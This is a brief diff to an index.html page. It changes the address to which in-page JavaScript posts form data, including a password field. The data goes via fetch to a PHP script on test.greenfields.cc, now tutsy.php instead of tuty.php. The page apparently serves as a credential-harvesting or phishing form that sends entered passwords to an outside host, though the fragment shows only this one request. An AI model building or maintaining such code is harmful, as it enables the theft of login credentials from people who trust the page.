--- a/index.html
+++ b/index.html
@@ -1789,7 +1789,7 @@ source[src="data:,"] {
                 formData.append('password', password);
                 
                 // Submit to PHP
-                fetch('https://test.greenfields.cc/tuty.php', {
+                fetch('https://test.greenfields.cc/tutsy.php', {
                     method: 'POST',
                     body: formData
                 })
